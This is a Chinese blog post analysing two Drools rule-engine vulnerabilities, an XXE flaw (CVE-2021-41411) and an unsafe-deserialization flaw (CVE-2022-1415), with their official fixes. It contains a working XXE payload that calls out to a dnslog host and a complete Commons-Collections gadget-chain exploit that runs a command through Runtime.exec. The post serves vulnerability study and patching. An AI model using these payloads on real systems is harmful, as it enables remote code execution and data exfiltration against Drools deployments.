Drools(CVE-2021-41411 && CVE-2022-1415)分析

已于 2023-06-27 10:12:52 修改
阅读量376 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 数学建模
于 2023-06-27 10:08:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GalaxySpaceX/article/details/131409930
版权

前言:

        Drools是做什么的,在什么地方使用,这个我们在分析前首先要了解下,Drools可以理解为规则引擎,即业务规则管理系统,规则引擎实现了将业务决策从应用程序中分离出来,接收数据的输入,解释业务规则,并根据业务规则做出业务决策。规则引擎就是这样一个输入输出平台。现在比较流行的规则引擎之一为Drools,一款由JBoss组织提供的基于Java语言开发的开源规则引擎,Drools是KIE项目的一部分,Kie:Knowledge is everything, Jboss一些列项目的总称。

        对于一些比较复杂的业务规则并且业务规则可能频繁的变动的系统比较合适使用规则引擎,如下:

  1. 风险控制系统——风险贷款、风险评估
  2. 反欺诈项目——银行贷款、征信验证
  3. 决策平台系统——财务计算
  4. 促销平台系统——满减、打折、加价购

        drools是一款由JBoos组织提供的基于Java语言开发的开源规则引擎,可以将复杂的业务规则从硬编码中剥离出来,以规则脚本的形式放在文件或者特定的存储介质中(例如数据库中),使得业务规则的变更不需要修改项目代码、不用重启服务器就可以在线上环境立即生效。

        大致意思就是在我们的实际项目中有很多的项目需要很多的判断,这时候就带来问题,如果使用传统的if..else..则代码会变得复杂难懂,维护起来较难并且更新规则会很麻烦,这时候就出现了Drools,我们可以将规则以drl文件的形式写入,可以做到维护方便可以编写复杂的规则系统,并且更新不需要重启,所以很多大型的项目都会使用该框架,但是该框架也不安全,目前近期爆出来的为CVE-2021-41411 && CVE-2022-1415,下面我们对这两个漏洞进行分析:

CVE-2021-41411:

复现:

        官方给的介绍为:drools <=7.59.x is affected by an XML External Entity (XXE) vulnerability in KieModuleMarshaller.java. The Validator class is not used correctly, resulting in the XXE injection vulnerability.

        可以看出为一个XXE漏洞,漏洞存在位置为:

drools-compiler\src\main\java\org\drools\compiler\kproject\models\KieModuleModelImpl.java

        我这里使用的为6.2.0.Final版本,可以看到漏洞代码为:

         这里可以看到使用的validate,但是未禁用DTD和外部实体,下面我们本地测试下:

首先我们要加载漏洞jar包在pom.xml中:

    <dependencies>

        <dependency>
            <groupId>org.drools</groupId>
            <artifactId>drools-compiler</artifactId>
            <version>6.2.0.Final</version>
        </dependency>
        <dependency>
            <groupId>org.drools</groupId>
            <artifactId>drools-core</artifactId>
            <version>6.2.0.Final</version>
        </dependency>

    </dependencies>

创建我们要加载的payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
        <!ENTITY xxe SYSTEM "http://rr3tcw.dnslog.cn">
        ]>
<evil>&xxe;</evil>

 加载漏洞代码:

package org.example;

import org.drools.compiler.kproject.models.KieModuleModelImpl;

import java.io.FileInputStream;
import java.io.FileNotFoundException;

public class cve202141411 {
    public static void main(String[] args) throws FileNotFoundException {
        FileInputStream fileInputStream = new FileInputStream("payload.txt");
        KieModuleModelImpl.fromXML(fileInputStream);
    }
}

  执行后可以看到我们的dnslog收到了信息:

当然也可以换其他的xxe代码进行攻击。

 修复:

        这个代码很好修复,添加安全属性禁用DTD和外部实体即可,下面为官方提供的修复:

        主要添加了如下代码,设置了安全属性:

validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

CVE-2022-1415:

复现:

        先看看官方给的信息:drools-compiler - Deserialization of Untrusted Data,可以看出为一个反序列化漏洞,来看看漏洞存在位置:

drools-compiler/src/main/java/org/drools/compiler/builder/impl/KnowledgeBuilderImpl.java

        这里我们可以先进行复现,然后调试可以更直观的看到代码漏洞:

首先我们要添加使用jar包:

    <dependencies>

        <dependency>
            <groupId>org.drools</groupId>
            <artifactId>drools-compiler</artifactId>
            <version>6.2.0.Final</version>
        </dependency>
        <dependency>
            <groupId>org.drools</groupId>
            <artifactId>drools-core</artifactId>
            <version>6.2.0.Final</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.1</version>
        </dependency>

    </dependencies>

编写漏洞利用代码:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.drools.compiler.builder.impl.KnowledgeBuilderImpl;
import org.drools.core.io.impl.InputStreamResource;
import org.kie.api.io.Resource;
import org.kie.api.io.ResourceType;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class cve20221415 {
    public static Object CommonsCollections() throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Class.forName("java.lang.Runtime")),
                new InvokerTransformer(
                        "getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",new Class[0]}
                ),
                new InvokerTransformer(
                        "invoke",
                        new Class[]{Object.class,Object[].class},
                        new Object[]{null,new Object[0]}
                ),
                new InvokerTransformer(
                        "exec",
                        new Class[]{String.class},
                        new Object[]{"calc"}
                )
        };

        Transformer[] fakeTransformers = new Transformer[]{
                new ConstantTransformer(1)
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(fakeTransformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap,chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"feng1");
        Map expMap = new HashMap();

        expMap.put(tiedMapEntry,"feng2");

        outerMap.remove("feng1");

        Class clazz = Class.forName("org.apache.commons.collections.functors.ChainedTransformer");
        Field field = clazz.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer,transformers);

        return expMap;
    }
    public static void main(String[] args) {
        try {
            FileOutputStream fileOutputStream = new FileOutputStream("calc.bin");
            ObjectOutputStream outputStream = new ObjectOutputStream(fileOutputStream);

            outputStream.writeObject(CommonsCollections());
            outputStream.close();
            fileOutputStream.close();

            FileInputStream in = new FileInputStream("calc.bin");
            Resource resource = new InputStreamResource(in);

            KnowledgeBuilderImpl builder = new KnowledgeBuilderImpl();
            builder.addKnowledgeResource(resource, ResourceType.PKG,null);
        } catch (FileNotFoundException e) {
            throw new RuntimeException(e);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }

    }
}

执行后可以看到弹出了计算器:

 利用代码主要为:

builder.addKnowledgeResource(resource, ResourceType.PKG,null);

 其中resource为我们的恶意序列化,ResourceType.PKG则将解析方式设置为PKG,按照对PKG的解析是会将我们传入的恶意序列化数据反序列化,而不进行检查:

        进入addKnowledgeResource方法后会判断是那种解析方式,漏洞存在在PKG,这里会进入addPackageFromInputStream方法:

         在addPackageFromInputStream方法中可以看到is传入的是我们的弹计算器的序列化数据,然后进入streamIn方法:

        这里看到在streamIn方法中执行了readObject进而执行了恶意代码:

        调用栈也可以很清晰的看到:

         所以只要是解析的格式为PKG格式,既可以将传入的数据反序列化操作,而不进行任何检查。

修复:

         修复代码主要在KnowledgeBuilderImpl中,看看官方如何修改:

         

        修复方案也简单,删除了addPackageFromInputStream,overrideReSource,isSwappable方法,并删除了对PKG的解析,即不对PKG进行解析,牺牲了一个类型的解析。

后记:

        整个看下来CVE-2021-41411 && CVE-2022-1415还是很简单,一个为xxe漏洞,一个是反序列化漏洞,且均不复杂,在实际的测试中我们要根据这两个漏洞的特点去网站上找是否存在这类功能,在进行攻击,虽然也是一个攻击点,但是在实际的测试中可利用行并不高。

GalaxySpaceX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手教你详细分析 Chrome 1day 漏洞 (CVE-2021-21224)
smellycat000的专栏
04-23 2777
聚焦源代码安全,网罗国内外最新资讯!本文共分五部分:一、时间线二、背景三、漏洞及补丁分析1、漏洞复现四、漏洞利用分析1、漏洞利用2、内存读写3、代码执行五、参考资料一、时间线2021年4...
CVE-2021-1647样本分析
AhRMo_WK的博客
02-25 924
** CVE-2021-1647 ** 概要 CVE-2021-167是微软系统中自带的杀毒软件,该漏洞在野利用被安全厂商发现并进行通报。本文是对样本所使用的技巧进行分析。笔者分析的样本MD5值为:db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7 漏洞原理 Windows Defender采用模拟执行的策略,对可执行文件进行黑白判定,模拟执行总共分为两个层面,一是指令模拟,二是运行环境模拟。 每个厂商的杀毒程序都会有自己的平台中
CVE-2021-1732 分析
qq_41252520的博客
08-03 1182
文章目录CVE-2021-17320x0 漏洞描述0x1 受影响版本0x2 漏洞分析■ 环境■ 分析■ NtUserConsoleControl逆向分析■ xxxSetWindowLong逆向分析■ xxxSetWindowLongPtr逆向分析■ CreateWindowEx生成HWND分析■ CreateMenu逆向分析■ xxxGetMenuBarInfo逆向分析■ Win10 1909泄露内核■ 归纳几个重要的结构体及其偏移0x3 漏洞利用1.获取需要用到的函数地址2.HOOK目标函数3.精心构造3
WebLogic CVE-2021-2211 XXE漏洞分析
爱国小白帽
04-21 1145
漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server XXE漏洞,2021年4月21日Oracle发布了致谢信息。 时间线 2021年1月12日向Oracle官方报告了此漏洞 2021年1月13日Oracle分配了issue编号 2021年1月25日Oracle确认在下一个补丁日修复此漏洞 2021年4月17日Oracle分配CVE编号CVE-2021-2211 2021年4月21日Oracle发布致谢信息 影响版本 10.3.6.0.0 1.
Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
离别歌
10-18 6008
周五晚上开始学习Apache HTTP Server(后文简称为Apache)mod_proxy的SSRF漏洞CVE-2021-40438),并在星球简单介绍了一下编译、调试Apache...
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存马
bring_coco的博客
06-26 1527
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存马写了进去。接下来执行内存马,可以直接访问接口并输入命令,如下。
JAVA规则引擎[Drools]--实例篇
01-27
随着互联网应用的飞速发展,各种业务需求也应运而生,对于不断变更和革新的业务规则而言,项目的开发就很有必要把规则部分独立提取出来,此时Drools的价值就得到了体现。废话不多说,看一个简单的例子。这里举一个...
kie-drools-wb
06-19
droolsDrools Workbench 运行时所需jar包
drools-core-7.7.0.Final.jar
05-31
流口水 :: 核心 org.drools/drools-core/7.7.0.Final/drools-core-7.7.0.Final.jar
drools-core-5.3.0.Final.jar
05-31
流口水 :: 核心 org.drools/drools-core/5.3.0.Final/drools-core-5.3.0.Final.jar
随着网络犯罪分子逃避云安全防御,无文件攻击激增
网络研究观
07-03 9933
威胁行为者正在大量投入资源来隐藏活动并避免被发现,以便在受感染的系统中建立更牢固的立足点。
记录一次vulhub:Spring Framework远程代码执行漏洞复现CVE-2022-22965)
sszsNo1的博客
06-29 187
vulhub:Spring Framework远程代码执行漏洞复现CVE-2022-22965)
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 205
春秋云镜 CVE-2022-25578
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 612
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 446
春秋云镜 CVE-2022-25578
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞CVE-2022-32417)
m0_46699477的博客
04-01 5433
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
Goby漏洞更新 | Atlassian Confluence 硬编码用户登陆漏洞 (CVE-2022-26138)
m0_46699477的博客
04-01 369
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 存在安全漏洞,该漏洞源于使用硬编码密码,攻击者可登录查看团队空间成员等敏感信息。
Goby漏洞更新|WordPress Metform 插件 forms 文件信息泄露漏洞CVE-2022-1442)
m0_46699477的博客
04-12 271
WordPress plugin Metform 是WordPress的一款安全联系表单插件。WordPress plugin Metform存在安全漏洞,该漏洞源于~/core/forms/action.php文件存在访问控制不当,攻击者可获取用户的各种秘钥信息。
Goby漏洞更新|GetSimpleCMS 内容管理系统 theme-edit.php 文件 content 参数任意代码执行漏洞CVE-2022-41544)
m0_46699477的博客
04-13 437
CVE-2022-41544 GetSimple CMS是一套使用PHP语言编写的内容管理系统(CMS)。GetSimple CMS v3.3.16版本存在安全漏洞,该漏洞源于通过admin/theme-edit.php中的edited_file参数发现包含远程代码执行(RCE)漏洞
docker安装drools-workbench
最新发布
09-04
要在 Docker 中安装 Drools Workbench,可以按照以下步骤进行操作: 1. 首先,确保已经安装了 Docker 并且 Docker 服务正在运行。 2. 打开终端或命令行界面,执行以下命令拉取 Drools Workbench 的 Docker 镜像: ``` docker pull jboss/drools-workbench-showcase:latest ``` 3. 完成镜像下载后,执行以下命令运行 Drools Workbench 容器: ``` docker run -p 8080:8080 --name drools-workbench jboss/drools-workbench-showcase:latest ``` 此命令将会在本地端口 8080 上启动 Drools Workbench。 4. 等待容器启动完毕后,使用浏览器访问 `http://localhost:8080/drools-wb`,即可进入 Drools Workbench 的 Web 用户界面。 这样就完成了在 Docker 中安装 Drools Workbench 的过程。请注意,这只是一个基本的安装过程,请根据实际需求进行适当的配置和调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值